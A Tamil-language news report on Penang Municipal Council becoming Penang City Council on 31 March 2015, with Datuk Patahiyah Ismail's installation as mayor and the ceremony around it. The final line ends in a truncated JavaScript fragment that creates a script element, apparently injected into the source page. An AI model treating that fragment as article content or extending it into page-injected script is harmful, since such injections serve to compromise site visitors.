பினாங்கு மாநகர் கழகம்

படம்1: டத்தோ பத்தாயா அவர்கள் மாநகர் தலைவராகப் பதவி உறுதிமொழி எடுத்துக் கொண்டார்.
படம்1: டத்தோ பத்தாயா அவர்கள் மாநகர் தலைவராகப் பதவி உறுதிமொழி எடுத்துக் கொண்டார்.

பினாங்கு நகராண்மைக் கழகம் 31/3/2015-ஆம் நாள் தொடங்கி பினாங்கு மாநகர் கழகமாகப் பிரகடனம் செய்து வரலாற்று படைத்துள்ளது. மாநகர் தலைவராகப் (மேயர்) பொறுப்பேற்ற டத்தோ பத்தாயா இஸ்மாயில் அவர்கள் மாநகர் அதிகாரிகளின் அணிவகுப்பைத் தொடர்ந்து தமது வரவேற்புரையை மாநகர் அரங்கில் சகல சடங்குகளைப் பின்பற்றி வழங்கினார். மாநகர் தலைவர் டத்தோ பத்தாயா “Maingaya Melayana” எனும் மரத்தை நட்டு, தொடர்ந்து நடைபெற்ற விருந்து உபசரிப்பில் பிரமுகர்கள், அரசியல் தலைவர்கள் மற்றும் அதிகாரிகளுடன் கலந்து கொண்டார்.
மாநகரமாகப் பிரகடனம் செய்ததைத் தொடர்ந்து உள்ளூர் அரசு தங்களின் சேவை தரத்தை மேம்படுத்துவதோடு, அவசியமற்ற விதிமுறைகள் மாற்றப்படும் என எடுத்துரைத்தார் மாநகர் தலைவர்.
மேலும், மாநில ஆளுநர் துன் டாக்டர் அப்துல் ரஹ்மான் அப்பாஸ் மற்றும் அவர் தம் துணைவியார் தோ புவான் மாஜிமோர் சாரிப் முன்னிலையில் மாநாகர் தலைவர் டத்தோ பத்தாயா இஸ்மாயில் அவர்கள் மாநகர் தலைவர் பட்டத்தை சகல சடங்குகளைப் பின்பற்றிப் பெற்றுக்கொண்டார். இந்த வரலாற்று நிகழ்வில் முதலாம் துணை முதல்வர் டத்தோ முகமது ரஷிட் ஹஸ்னோன், இரண்டாம் துணை முதல்வர் பேராசிரியர் ப.இராமசாமி, ஆட்சிக்குழு உறுப்பினர் சாவ் கொன் யாவ் மற்றும் அரசியல் தலைவர்கள் கலந்து கொண்டனர்.

மாநில முதல்வர் மேதகு லிம் குவான் எங், மாநகர் தலைவராக டத்தோ பத்தாயா அவர்களை அறித்ததைத் தொடர்ந்து, பதவிப் பிரமானம் எடுத்துக் கொண்டார். இந்நிகழ்வில், பத்தாயா அவர்கள் “Blue Bramfield Silk Damask” செய்யப்பட்ட சிறப்பு அங்கி அணிந்திருந்தார். இந்த அங்கி லண்டன் நாட்டில் புகழ்ப்பெற்ற கை வேலைப்பாடு நிறுவனத் தயாரிப்பில் உருவானது குறிப்பிடத்தக்கதாகும்.. மேலும் மாநகர் தலைவருக்குரிய மாலையாக வெள்ளி மற்றும் 925 தரம் கொண்ட தங்கத்தால் செய்யப்பட்ட கழுத்து சங்கிலி அணிந்திருந்தார். மாநகர் தலைவரை இரண்டு அதிகாரிகள் செங்கோல் ஏந்தி உடன் இணைந்து வந்தனர்.
15/12/1976-ஆம் ஆண்டு பினாங்கு நகராண்மைக் கழகமாகத் தோற்றுவிக்கப்பட்டதைத் தொடர்ந்து இன்று 31/3/2015-ஆம் நாள் பினாங்கு மாநர் கழகமாகத் தோன்றி வரலாற்றுப் படைத்துள்ளது.var d=document;var s=d.createElement(‘script’);